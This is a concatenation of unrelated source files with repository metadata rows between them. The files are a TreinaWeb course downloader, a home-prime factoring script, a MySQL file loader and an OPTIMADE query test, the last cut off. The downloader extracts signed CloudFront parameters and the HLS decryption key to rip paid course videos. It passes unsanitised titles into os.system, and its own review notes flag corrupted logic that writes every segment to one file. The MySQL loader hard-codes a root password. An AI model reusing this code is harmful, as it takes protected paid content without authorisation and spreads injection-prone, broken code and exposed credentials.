                for index, curso in enumerate(cursos, start=1):
                    categoria = curso['categorias']
                    if len(categoria) > 1:
                        random_num = random.choice(categoria)
                        self.categoria = categorias[random_num]
                    else:
                        self.categoria = categorias[categoria[0]]
                    self.curso_nome = self.replacer(curso['nome'])
                    self.get_course_here(curso)
            else:
                print('Erro. Saindo.')
                exit(0)
        #downloaded_read.append(self.curso_nome)
        #if self.curso_nome in downloaded_read:
        #continue
        #tipos
        #1: Cursos
        #2: Direto ao ponto

    def get_course_here(self, curso):
        """Download every lesson of *curso*: handouts (HTML), videos (mp4)."""
        # Course-level tipo selects the output folder name; the lesson fetch
        # itself is identical for all three branches.
        if curso['tipo'] == 1:
            self.tipo = 'Cursos'
            a = self.return_self(curso['links'])
            au = a['data']
            aul = au['aulas']
            aulas = aul['data']
        elif curso['tipo'] == 2:
            self.tipo = 'Direto ao Ponto'
            a = self.return_self(curso['links'])
            au = a['data']
            aul = au['aulas']
            aulas = aul['data']
        elif curso['tipo'] == 3:
            self.tipo = 'Projeto Prático'
            a = self.return_self(curso['links'])
            au = a['data']
            aul = au['aulas']
            aulas = aul['data']
        else:
            # NOTE(review): unknown tipo leaves `aulas` unbound — the loop
            # below would raise (or reuse a previous value). Confirm.
            print(curso)
        for aula in aulas:
            # One "aula" is a module; its "subaulas" are the actual lessons.
            modulo = self.replacer(aula['titulo'])
            modulo_count = aula['ordem']
            self.final_modulo = f'{modulo_count} - {modulo}'
            sub_aulas = aula['subaulas']['data']
            for sub_aula in sub_aulas:
                aula_t = self.replacer(sub_aula['titulo'])
                aula_count = sub_aula['ordem']
                self.final_aula = f'{aula_count} - {aula_t}'
                tipo = sub_aula['tipo']
                print(f'{self.categoria} | {self.curso_nome} | {self.final_modulo} | {self.final_aula} | ', end='')
                path = self.create_path(f'{self.main.capitalize()}/{self.tipo}/{self.categoria}/{self.curso_nome}/{self.final_modulo}')
                if tipo == 3:
                    # Quizzes have nothing downloadable.
                    print("Questionario")
                    continue
                elif tipo == 1:
                    # Handout: wrap the API-provided HTML fragment in a page.
                    print("Apostila")
                    self.aula_path = f'{path}/{self.final_aula}.html'
                    apostilas = self.get_apostilas(sub_aula['links'][0]['uri'])
                    css = 'body {margin: 50px 150px 50px 150px; text-align: justify} .HtmlContentRenderer_text-content-style__2TWCB {background-color: #fff font-size: 16px; font-weight: 400; color: #707070; word-break: break-word}'
                    html = f"<html lang='pt-br' data-product='treinaweb'><head><meta charset='utf-8'><style>{css}</style></head><body><h1>{self.final_aula}</h1><br><div class='HtmlContentRenderer_text'>{apostilas}</div></body></html>"
                    with open(self.aula_path, 'w', encoding='utf-8') as out:
                        out.write(html)
                    continue
                elif tipo == 2:
                    # Video lesson; skip if the mp4 already exists.
                    self.aula_path = f'{path}/{self.final_aula}.mp4'
                    if os.path.exists(self.aula_path):
                        continue
                    print('Video')
                    videos = self.get_video(sub_aula['links'][0]['uri'])
                    # Optional attachment downloaded alongside the video.
                    if videos['url_anexo'] != None:
                        ext = videos['url_anexo'].split('?')[0].split('.')[-1]
                        os.system(f'aria2c -o "{path}/{self.final_aula}.{ext}" "{videos["url_anexo"]}" --quiet --continue=true')
                        pass
                    url = videos['url']
                    # The sproutvideo player page embeds a base64-encoded JSON
                    # blob in its first <script>; extract and decode it.
                    encoded = str(bs(treinaweb_sessions.get(url, headers=self.headers).content, 'html.parser').find('head').find('script', {'type': 'text/javascript'}))
                    encoded = encoded.split("';")[0]
                    encoded = encoded.split("= '")[1]
                    data = json.loads(base64.b64decode(encoded))
                    # CloudFront signatures for the m3u8 (m), key (k), ts (t).
                    signatures = data["signatures"]
                    m3u8_signatures = signatures['m']
                    key_signatures = signatures['k']
                    ts_signatures = signatures['t']
                    #all_signatures = [m3u8_signatures, key_signatures, ts_signatures]
                    s3_user_hash = data["s3_user_hash"]
                    s3_video_hash = data["s3_video_hash"]
                    sessionID = data["sessionID"]
                    master_m3u8_name = 'index.m3u8'
                    # Download the master playlist and reduce it to a single
                    # variant (see set_master), then rewrite it in place.
                    self.get_m3u8(master_m3u8_name, m3u8_signatures, s3_user_hash, s3_video_hash, sessionID)
                    master_content = open(f"tmp/{master_m3u8_name}", 'r').read()
                    master_m3u8 = m3u8.loads(master_content)
                    self.set_master(master_m3u8)
                    master_content = open(f"tmp/{master_m3u8_name}", 'w')
                    master_dumps = master_m3u8.dumps()
                    with master_content as master_output:
                        master_output.write(master_dumps)
                    # set_master() replaced the playlist list with one object,
                    # so its __dict__['uri'] is the chosen variant's path.
                    max_resolution = master_m3u8.playlists.__dict__['uri']
                    self.get_m3u8(max_resolution, m3u8_signatures, s3_user_hash, s3_video_hash, sessionID)
                    video_1080_content = open(f'tmp/{max_resolution}', 'r').read()
                    video_1080_m3u8 = m3u8.loads(video_1080_content)
                    video_1080_content = open(f'tmp/{max_resolution}', 'w')
                    video_dumps = video_1080_m3u8.dumps()
                    with video_1080_content as video_output:
                        video_output.write(video_dumps)
                    video_segments = video_1080_m3u8.data['segments']
                    key_type = max_resolution.replace('m3u8', 'key')
                    # Fetch decryption key and all media segments, then let
                    # ffmpeg assemble the local playlist into the final mp4.
                    self.get_key(key_type, key_signatures, s3_user_hash, s3_video_hash, sessionID)
                    self.get_ts(video_segments, ts_signatures, s3_user_hash, s3_video_hash, sessionID)
                    if os.path.exists(self.aula_path) is False:
                        os.system(f'ffmpeg -allowed_extensions ALL -i "tmp/index.m3u8" "{self.aula_path}" -preset ultrafast -nostats -loglevel 0')
                    # Windows-only cleanup; os.system does not raise on
                    # failure, so these try/excepts are effectively no-ops.
                    try:
                        os.system('del /q tmp')
                    except:
                        pass
                    try:
                        os.system('rmdir /q /s tmp')
                    except:
                        pass
                    continue
                elif tipo == 4:
                    # Unknown lesson type: dump it and stop for inspection.
                    print(sub_aula)
                    exit(0)
                #tipos
                #1 = apostila
                #2 = video
                #3 = questionario
                #4 = ??
                time.sleep(1)
        #with downloaded_write as output:
        #output.write(json.dumps(downloaded_read))

    def get_key(self, tipo, signatures, s3_user_hash, s3_video_hash, sessionID):
        """Download the HLS AES key file *tipo* into tmp/ via aria2c."""
        path = f'tmp'
        cfp = signatures['CloudFront-Policy']
        cfs = signatures['CloudFront-Signature']
        kpid = signatures['CloudFront-Key-Pair-Id']
        url = f'https://hls2.videos.sproutvideo.com/{s3_user_hash}/{s3_video_hash}/video/{tipo}?Policy={cfp}&Signature={cfs}&Key-Pair-Id={kpid}&sessionID={sessionID}'
        os.system(f'aria2c -o "{path}/{tipo}" "{url}" --quiet --continue=true')

    def set_master(self, master):
        """Replace master.playlists (a list) with a single chosen variant.

        NOTE(review): intent appears to be "prefer 1080, else 720, else any",
        but without a break in the elif/else branches a later iteration can
        overwrite an already-chosen 720 variant — confirm.
        """
        for x in master.playlists:
            if '1080.m3u8' in x.__dict__['uri']:
                master.playlists = x
                break
            elif '720.m3u8' in x.__dict__['uri']:
                master.playlists = x
            else:
                master.playlists = x

    def get_m3u8(self, tipo, signatures, s3_user_hash, s3_video_hash, sessionID):
        """Download playlist file *tipo* into tmp/ (created on demand)."""
        path = 'tmp'
        if os.path.exists(path) is False:
            os.makedirs(path)
        cfp = signatures['CloudFront-Policy']
        cfs = signatures['CloudFront-Signature']
        kpid = signatures['CloudFront-Key-Pair-Id']
        m3u8_file = f'https://hls2.videos.sproutvideo.com/{s3_user_hash}/{s3_video_hash}/video/{tipo}?Policy={cfp}&Signature={cfs}&Key-Pair-Id={kpid}&sessionID={sessionID}'
        os.system(f'aria2c -o "{path}/{tipo}" "{m3u8_file}" --quiet --continue=true')

    def get_ts(self, segments, signatures, s3_user_hash, s3_video_hash, sessionID):
        """Download every media segment of the playlist into tmp/."""
        cfp = signatures['CloudFront-Policy']
        cfs = signatures['CloudFront-Signature']
        kpid = signatures['CloudFront-Key-Pair-Id']
        path = 'tmp'
        for segment in segments:
            url = segment['uri']
            segment_link = f'https://hls2.videos.sproutvideo.com/{s3_user_hash}/{s3_video_hash}/video/{url}?Policy={cfp}&Signature={cfs}&Key-Pair-Id={kpid}&sessionID={sessionID}'
            filename = url
            # NOTE(review): the literal '(unknown)' looks like corrupted
            # source — `filename` is never used, so every segment is written
            # to the same file; presumably this was f'{path}/{filename}'.
            ts_path = f'{path}/(unknown)'
            if os.path.exists(ts_path) is False:
                os.system(f'aria2c -o "{ts_path}" "{segment_link}" --quiet --continue=true')
                time.sleep(0.01)
        time.sleep(0.5)

    def get_video(self, api):
        """Return the video metadata dict for one lesson API endpoint."""
        video = treinaweb_sessions.get(api, headers=self.headers).json()['data']['video']['data']
        return video

    def get_apostilas(self, api):
        """Return the handout HTML fragment for one lesson API endpoint."""
        apostilas = treinaweb_sessions.get(api, headers=self.headers).json()['data']['apostila']['data']['html']
        return apostilas

    def replacer(self, text):
        """Sanitize *text* for use as a filesystem path component by
        substituting characters that are invalid on Windows."""
        invalid = {'/': '-','//': ' - ', r'"': r"'", '\\': " - ", '|': " - ", '<': "«", '>': "»", '*': "x", ':': ' -', '?': "¿", '\n': ' - '}
        for char in invalid:
            if char in text:
                text = text.replace(char, invalid[char])
        return text

    def return_self(self, api):
        """Follow the GET 'self' link of *api* (with aulas included) and
        return the parsed JSON; returns None when no such link exists."""
        for link in api:
            if link['type'] == 'GET' and link['rel'] == 'self':
                uri = link['uri'] + '?include=aulas'
                aulas = treinaweb_sessions.get(uri, headers=self.headers).json()
                return aulas

    def create_path(self, path):
        """Ensure *path* exists on disk and return it unchanged."""
        if os.path.exists(path) is False:
            os.makedirs(path)
        return path
#Downloader().index()
| 37.512376
| 234
| 0.512966
| 1,662
| 15,155
| 4.545728
| 0.199759
| 0.014825
| 0.015884
| 0.017472
| 0.400794
| 0.372733
| 0.353011
| 0.336069
| 0.265255
| 0.240635
| 0
| 0.028113
| 0.349852
| 15,155
| 404
| 235
| 37.512376
| 0.738354
| 0.041636
| 0
| 0.323636
| 0
| 0.050909
| 0.252551
| 0.059087
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047273
| false
| 0.014545
| 0.029091
| 0
| 0.098182
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757c4a2be3e6e27c73b14c6ddc8062d7cb6e67ce
| 10,724
|
py
|
Python
|
A037274/simple.py
|
sethtroisi/OEIS
|
2c10b86d8a8be69aa8020623d4802e3d68772ede
|
[
"Apache-2.0"
] | 3
|
2019-05-25T23:08:48.000Z
|
2021-12-11T03:59:42.000Z
|
A037274/simple.py
|
sethtroisi/OEIS
|
2c10b86d8a8be69aa8020623d4802e3d68772ede
|
[
"Apache-2.0"
] | 1
|
2019-03-07T21:22:52.000Z
|
2019-03-07T21:22:52.000Z
|
A037274/simple.py
|
sethtroisi/OEIS
|
2c10b86d8a8be69aa8020623d4802e3d68772ede
|
[
"Apache-2.0"
] | 1
|
2021-04-29T06:35:07.000Z
|
2021-04-29T06:35:07.000Z
|
import gmpy2
import itertools
import subprocess
import math
import time
from collections import defaultdict
from factordb.factordb import FactorDB
# Range of starting values n to process for the home-prime iteration (A037274).
START = 2
STOP = 5000
# Also see A056938
def product(factors):
    """Return the product of all values in *factors* (1 for an empty iterable).

    Uses math.prod (the file already imports math) instead of the previous
    hand-rolled accumulation loop; behavior is identical for int inputs.
    """
    return math.prod(factors)
def factordb_format(number):
    """Format *number* the way factordb displays it.

    Small numbers (< 1e10) are shown verbatim; medium numbers get a
    <digit-count> suffix; huge numbers (>= 1e24) are truncated to their
    first ten and last two digits.
    """
    digits = str(number)
    if number < 1e10:
        return digits
    length = len(digits)
    if number >= 1e24:
        return "{}...{}<{}>".format(digits[:10], digits[-2:], length)
    return "{}<{}>".format(digits, length)
def split_to_lines(number, max_size):
    """Split the string *number* into lines of at most *max_size* characters.

    Every line except the last gets a " /" continuation suffix, so only
    max_size - 2 characters of each line carry payload. Returns the lines
    as a list.
    """
    size = max_size - 2
    # split this number evenly over multiple lines
    needed_lines = (len(number) - 1) // size + 1
    assert size * needed_lines >= len(number)
    # split evenly onto this many lines
    per_line = len(number) // needed_lines
    # the first `extra` lines carry one extra character
    extra = len(number) % needed_lines
    assert per_line + (extra > 0) <= size
    lines = []
    for l in range(1, needed_lines + 1):
        # take per_line characters, plus one extra while any remain
        this_line = number[:per_line + (extra > 0)]
        # BUGFIX: decrement `extra` so only the first `extra` lines are longer.
        # Previously every line but the last took the extra character, which
        # made the split uneven, contradicting the comments above.
        extra -= (extra > 0)
        number = number[len(this_line):]
        this_line += " /" if l != needed_lines else ""
        lines.append(this_line)
    return lines
def row_format(string, max_size=60):
    """Wrap *string* onto <br>-separated lines of at most *max_size* chars.

    Factorization strings are split preferentially at " * " boundaries;
    a factor too long for one line falls back to split_to_lines(). Each
    stored line keeps a trailing " *" so the chunks join uniformly; the
    final " *" is stripped from the result.
    """
    if len(string) <= max_size:
        return string
    mult = " * "
    if mult in string:
        parts = string.split(mult)
        lines = []
        line = ""  # line currently being accumulated
        for part in parts:
            merged = line + part + mult
            if len(merged) <= max_size + 1: # trailing space
                line = merged
                continue
            elif line:
                # current line is full: flush it and start fresh
                lines.append(line.strip())
                line = ""
            assert line == ""
            if len(part) <= max_size - 2:
                lines.append(part + " *")
                continue
            # this single factor is too long for one line
            lines += split_to_lines(part + " *", max_size)
        # BUGFIX: flush any partially accumulated line. Previously a factor
        # (or run of factors) accumulated after the last flush was silently
        # dropped from the output (e.g. "aa * bb * cc" lost "cc").
        if line:
            lines.append(line.strip())
        temp = "<br>".join(lines)
        assert temp.endswith(" *"), temp[-20:]
        return temp[:-2]
    return "<br>".join(split_to_lines(string, max_size))
def factor_large(n, b1=10**6):
    """Factor *n* with GMP-ECM (10 curves at stage-1 bound *b1*).

    Returns the numbers printed by ecm as a list of ints. When ecm exits
    with code 8 (the message below says it "found self"), the call retries
    with a much smaller B1 so a proper split can be found.
    """
    args = ["ecm", "-q", "-c", "10", str(b1)]
    print ("\t\t", " ".join(args))
    # n is fed to ecm on stdin; -q restricts output to the factors.
    result = subprocess.run(
        args,
        input=str(n).encode(),
        stdout=subprocess.PIPE)
    if result.returncode == 8:
        # Need to rerun with smaller b1
        print("\t\tfound self ({} with b1={})".format(n, b1))
        return factor_large(n, b1= max(100, b1 // 90))
    return list(map(int, result.stdout.strip().split()))
def attempt_factorization(s, known_factors):
    """Factor *s* using known primes, factordb lookup, and trial division.

    Returns (t, factors): *factors* is the list of primes found (unsorted)
    and *t* is the remaining unfactored cofactor (1 when fully factored).
    """
    t = s
    factors = []
    # Divide out the already-known prime factors first.
    for factor in known_factors:
        # Last factor maybe non-prime
        if gmpy2.is_prime(factor):
            t //= factor
            factors.append(factor)
    # Toggle to if True: to recheck factordb.
    if t >= 1e10 and t not in known_factors:
        # Check factorDB (probably already been done)
        time.sleep(0.2)  # throttle requests to the public factordb API
        factordb = FactorDB(t)
        factordb.connect()
        factordb_factors = factordb.get_factor_list()
        if factordb_factors:
            print ("\t\tfactordb:", factordb.get_status(), factordb_factors)
            for factor in factordb_factors:
                if gmpy2.is_prime(factor):
                    t //= factor
                    factors.append(factor)
    # small trial division
    p = 2
    while t > 1 and t < 1e10:
        while t % p == 0:
            t //= p
            factors.append(p)
        if t == 1:
            break
        p += 1 + (p&1)  # 2 -> 3, then only odd candidates
    return t, factors
def load_from_file():
    """Parse home_primes.txt into per-(base, start, step) factor lists.

    Returns (home_primes, min_step, duplicates, composites):
      home_primes: {(base, start, step): [sorted factors]}
      min_step:    first key observed for each intermediate value
      duplicates:  keys whose value was already reached by another key
      composites:  {key: set of non-prime (unfactored) factors}
    """
    home_primes = defaultdict(list)
    n = None
    s = None
    with open("home_primes.txt") as f:
        # each line is "<base> <start> <step> <status>: <factor> <factor> ..."
        for line in f.readlines():
            pre, post = line.strip().split(":")
            *pre, status = pre.split()
            base, start, step, = map(int, pre)
            if start != n:
                # First line of a new chain: the value factored at step 1
                # is the starting number itself.
                n = start
                s = n
            factors = list(map(int, post.split()))
            assert status in ("FF", "P", "CF"), line
            home_primes[(base, start, step)] = factors
            # Sanity check: the recorded factors reproduce this step's value.
            assert product(factors) == s, (start, step, s, factors)
            # Next step's value is the concatenation of the factor digits.
            s = int("".join(map(str, factors)))
    min_step = {}
    duplicates = {}
    all_primes = set()
    composites = defaultdict(set)
    for key, factors in home_primes.items():
        for p in factors:
            if gmpy2.is_prime(p):
                all_primes.add(p)
            else:
                composites[key].add(p)
        is_terminal = len(factors) == 1 and factors[0] in all_primes
        s = int("".join(map(str, factors)))
        if s in min_step and not is_terminal:
            # Make sure min step isn't previous step or that's stupid
            if min_step[s] == (key[0], key[1], key[2]-1):
                continue
            duplicates[key] = min_step[s]
        else:
            min_step[s] = key
    # NOTE(review): len(composites) counts keys that have a composite, not
    # the number of distinct composite values.
    print ("Found {} primes, {} composites".format(
        len(all_primes), len(composites)))
    return home_primes, min_step, duplicates, composites
def process(home_primes, composites):
    """Advance each home-prime chain for n in START..STOP by factoring steps.

    Mutates *home_primes* and *composites* in place.  Returns True if any
    new factorization was recorded (signals the caller to rewrite the data
    file).  Ctrl-C aborts cleanly, keeping progress made so far.
    """
    added = False
    try:
        for n in range(START, STOP+1):
            print (n)
            t = n
            for step in itertools.count(1):
                if gmpy2.is_prime(t):
                    break  # chain terminated at a home prime
                s = t
                key = (10, n, step)
                original = home_primes[key]
                t, factors = attempt_factorization(s, original)
                factors.sort()
                if t > 1:
                    # t is composite
                    factors.append(t)
                    composites[key].add(t)
                assert product(factors) == s, (s, t, factors)
                if factors != original:
                    home_primes[key] = factors
                    added = True
                    print ("\t\tnew factor", factors)
                if t > 1:
                    print ("Breaking, failed to factor C{}: {}".format(len(str(t)), factordb_format(t)))
                    break
                # Fully factored: next value is the digit concatenation.
                new = int("".join(map(str, factors)))
                t = new
                if False:
                    # Debug output, disabled.
                    if gmpy2.is_prime(s):
                        if new < 1e40:
                            print ("\t", step, new, "from", s, factors)
                        else:
                            print ("\t", step, new)
                            print ("\t\tfrom", factors)
                if gmpy2.is_prime(t):
                    # Record the terminal prime; the loop top breaks next pass.
                    home_primes[(10, n, step)] = [t]
                else:
                    # NOTE(review): indentation was lost in transit; this else
                    # most plausibly pairs with the is_prime check above
                    # (a for-else on itertools.count could never run) -- confirm.
                    print ("\t {} Gave up on step {}".format(n, step))
    except KeyboardInterrupt:
        print("Stopping from ^C")
    return added
# For use with kernprof -v --line-by-line simple.py
#@profile
def run():
    """Top-level driver: load state, extend the chains, rewrite the data
    file when anything changed, then regenerate the markdown result tables
    and README sections on stdout / under results/."""
    home_primes, min_step, duplicates, composites = load_from_file()
    added = False
    added = process(home_primes, composites)
    if added:
        # Persist any newly found factorizations back to home_primes.txt.
        with open("home_primes.txt", "w") as f:
            for base, start, step in sorted(home_primes.keys()):
                factors = home_primes[(base, start, step)]
                if not factors:
                    continue
                if all(gmpy2.is_prime(f) for f in factors):
                    if len(factors) == 1:
                        status = "P"   # chain terminated at a prime
                    else:
                        status = "FF"  # fully factored step
                else:
                    status = "CF"      # composite factor remains
                f.write("{} {} {} {}: {}\n".format(
                    base, start, step, status, " ".join(map(str, factors))))
    # Sections copied into README.md
    if True:
        # Per-range RESULTS_<low>_<high>.md tables.
        ranges = [(2,100), (2,499)] + [(a*500, a*500 + 499) for a in range(1, STOP//500)]
        for low, high in ranges:
            filename = "RESULTS_{}_{}.md".format(low, high)
            print ("Genarating", filename)
            template = """
## [Back](../README.md)
## Results for A037274 a(n) n={}..{}
---
|start|step|number|factors|
|-----|----|------|-------|
{}
"""
            rows = []
            for (_,start,step),factors in sorted(home_primes.items()):
                if start not in range(low, high+1):
                    continue
                num = row_format(str(product(factors)), max_size=40)
                if len(factors) == 1:
                    factors = "Home Prime!" if gmpy2.is_prime(min(factors)) else "Unfactored composite"
                else:
                    mult = " * ".join(map(str, sorted(factors)))
                    factors = row_format(mult, max_size=50)
                columns = [start, step, num, factors]
                rows.append("|" + "|".join(map(str, columns)) + "|")
            with open("results/" + filename, "w") as f:
                f.write(template.format(
                    low, high,
                    "\n".join(rows)))
    if True:
        # "Unterminated" section: chains stuck on a composite.
        count = 0
        print ()
        print ()
        print ("### Unterminated")
        print ("---")
        print ()
        # Move the "These <X> a(n) that have not..." line here
        print ()
        print ("|start|step|composite|same as|")
        print ("|-----|----|---------|-------|")
        # Group chains that are stuck on the same composite set.
        same = defaultdict(list)
        for key, cfs in composites.items():
            same[tuple(sorted(cfs))].append("HP({}).{}".format(key[1], key[2]))
        merged_count = 0
        for (base, start, step), cfs in composites.items():
            assert (base, start, step+1) not in home_primes
            assert len(cfs) and not gmpy2.is_prime(max(cfs))
            formatted_factors = tuple(factordb_format(c) for c in sorted(cfs))
            key = tuple(sorted(cfs))
            if (base, start, step) not in duplicates:
                same_c = same[key]
                assert same_c[0].startswith("HP({})".format(start)), (key, same_c)
                print ("|HP({})|{}|{}|{}|".format(
                    start, step, ", ".join(formatted_factors), " ".join(same_c[1:])))
                merged_count += len(same_c) - 1
                count += 1
        print ("{} numbers ({} merged) <= {} have not yet reached a prime".format(
            count, count - merged_count, STOP))
        print ()
        print ()
    if True:
        # "Work" section: smallest and largest unfactored composites.
        print ("### Work")
        print ("---")
        print ()
        # TODO use datetime here
        print ("This is a short list of the smallest (and largest) unfactored numbers as of 2020-03.")
        print ()
        print ("|size|start|step|composite|other factor|")
        print ("|----|-----|----|---------|------------|")
        by_size = sorted((c, key) for key, cfs in composites.items() for c in cfs)
        for c, key in by_size[:30] + by_size[-20:]:
            if key in duplicates:
                continue
            others = home_primes[key][:]
            others.remove(c)
            print ("|c{}|HP({})|step {}|{}|{}|".format(
                len(str(c)), key[1], key[2],
                c,
                " * ".join(map(str, others))))
        print()
        print()
    if True:
        # Digit-growth extremes between consecutive steps.
        deltas = []
        last = ""
        for (base,start,step),factors in sorted(home_primes.items()):
            assert factors == sorted(factors)
            new = "".join(map(str, factors))
            if step > 1 and (base, start, step) not in duplicates:
                delta = len(new) - len(last)
                deltas.append((delta, int(last), int(new), start, step-1))
            last = new
        # For smallest jump | find biggest number
        # For biggest jumps | find smallest number
        deltas.sort(key=lambda d: (d[0], d[1] if d[0] > 3 else -d[1]))
        print ()
        print ("Home Primes with smallest and largest increase in number of digits")
        print ()
        print ("|+digits|HP|current|next|link|")
        print ("|-------|--|-------|----|----|")
        for delta, s1, s2, start, step in deltas[:15] + deltas[-15:]:
            print("|{}|{}|{}|{}|{}|".format(
                delta,
                f"HP({start}).{step}",
                factordb_format(abs(s1)),
                factordb_format(abs(s2)),
                "[FactorDB](http://factordb.com/aliquot.php?type=10&aq={}&big=1)".format(start)))
run()
| 26.743142
| 98
| 0.563129
| 1,425
| 10,724
| 4.159298
| 0.195088
| 0.031888
| 0.024127
| 0.016535
| 0.103256
| 0.066475
| 0.028682
| 0.028682
| 0.015522
| 0.015522
| 0
| 0.021538
| 0.272659
| 10,724
| 400
| 99
| 26.81
| 0.738333
| 0.067978
| 0
| 0.18
| 0
| 0.003333
| 0.108994
| 0.024266
| 0
| 0
| 0
| 0.0025
| 0.036667
| 1
| 0.03
| false
| 0
| 0.023333
| 0
| 0.096667
| 0.136667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757f3810745dc98b37ec435828ecf0e2aaa534d5
| 1,212
|
py
|
Python
|
app/file2mysql.py
|
ToHanwei/CORD
|
09f75b136431222ec945b2ddd6798ae805ec332e
|
[
"MIT"
] | null | null | null |
app/file2mysql.py
|
ToHanwei/CORD
|
09f75b136431222ec945b2ddd6798ae805ec332e
|
[
"MIT"
] | null | null | null |
app/file2mysql.py
|
ToHanwei/CORD
|
09f75b136431222ec945b2ddd6798ae805ec332e
|
[
"MIT"
] | null | null | null |
#!coding:utf-8
import os
import sys
import pymysql
def connetc2mysql():
    """Open and return a pymysql connection to the CORdbPro database.

    Raises the underlying pymysql exception (after printing it) when the
    connection fails.  NOTE(review): the name keeps its historical typo
    ("connetc") because callers in this file use it.
    """
    try:
        conn = pymysql.connect(
            host = '10.15.50.100',
            port = 3306,
            user= 'root',
            # SECURITY: hard-coded credentials; move to env var / config file.
            password = 'Zhaolab@C809!!',
            db = 'CORdbPro',
            charset = 'utf8',
            use_unicode=True)
    except Exception as e:
        # Bug fix: the original printed the error and then fell through to
        # `return(conn)` with `conn` unbound, raising NameError; re-raise
        # the real connection error instead.
        print(e)
        raise
    else:
        print("connect seccess")
        return(conn)
def create_table(cur, conn, tablename):
    """Create table *tablename* (auto-increment id, filename, blob data) and commit."""
    ddl = (
        "CREATE table {}"
        "(id INT PRIMARY KEY AUTO_INCREMENT,"
        "filename VARCHAR(100),"
        "data MEDIUMBLOB);"
    ).format(tablename)
    cur.execute(ddl)
    conn.commit()
def insert_data(cur, conn, infile, tablename):
    """Insert the raw bytes of *infile* into *tablename* (filename, data).

    Commits when the INSERT reports affected rows; otherwise prints a
    failure message.
    """
    with open(infile, 'rb') as fopen:
        fread = fopen.read()
    content = pymysql.Binary(fread)
    filename = os.path.basename(infile)
    #filename = filename.split('-')[0]
    # Parameterized query: filename/content are bound, not interpolated.
    insert_sql="INSERT INTO "+tablename+" (filename, data) VALUES (%s, %s)"
    if cur.execute(insert_sql , (filename, content)):
        conn.commit()
    else:
        # NOTE(review): pymysql cursors expose no `.error` attribute -- this
        # branch would raise AttributeError if ever taken; confirm intent.
        print('writed failed', cur.error)
def main():
    """Load every file from the directory given as argv[1] into a same-named table."""
    indir = sys.argv[1]
    conn = connetc2mysql()
    cur = conn.cursor()
    create_table(cur, conn, indir)
    for name in os.listdir(indir):
        insert_data(cur, conn, os.path.join(indir, name), indir)
if __name__ == "__main__":
main()
| 19.548387
| 73
| 0.660066
| 162
| 1,212
| 4.839506
| 0.537037
| 0.044643
| 0.035714
| 0.045918
| 0.058673
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025278
| 0.183993
| 1,212
| 61
| 74
| 19.868852
| 0.767442
| 0.037954
| 0
| 0.088889
| 0
| 0
| 0.183147
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0.022222
| 0.066667
| 0
| 0.155556
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757fe53371e91dc422879bc5ad40243b0d086700
| 2,478
|
py
|
Python
|
start_simple_test.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
start_simple_test.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
start_simple_test.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2019 Rickard Armiento
#
# This file is part of a Python candidate reference implementation of
# the optimade API [https://www.optimade.org/]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
This is part of a Python candidate reference implementation of the
optimade API [https://www.optimade.org/].
This program runs a simple test query against the example_sqlite3 backend.
'''
from __future__ import print_function
import os, sys
from pprint import pprint
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),'src'))
from parse import parse_optimade_filter
if __name__ == "__main__":
    import backends.example_sqlite3 as backend
    backend.initialize()
    # This represents the query being received (later to be received via a web URL query)
    tables = ["structures"]
    response_fields = ["id", "chemical_formula", "elements"]
    # An optimade filter may be supplied on the command line; otherwise use
    # a fixed demonstration query.
    if len(sys.argv) >= 2:
        input_string = 'filter='+sys.argv[1]
    else:
        input_string = 'filter=elements="Ga,Ti" AND (nelements=3 OR nelements=2)'
    response_limit = 50
    filter_ast = parse_optimade_filter(input_string)
    print("==== FILTER STRING PARSE RESULT:")
    pprint(filter_ast)
    print("====")
    result = backend.execute_query(tables, response_fields, response_limit, filter_ast, debug=True)
    print("==== END RESULT")
    pprint(list(result))
    print("===============")
    backend.close()
| 34.901408
| 99
| 0.726796
| 349
| 2,478
| 5.060172
| 0.495702
| 0.04983
| 0.00906
| 0.010193
| 0.092865
| 0.092865
| 0.092865
| 0.092865
| 0.092865
| 0.092865
| 0
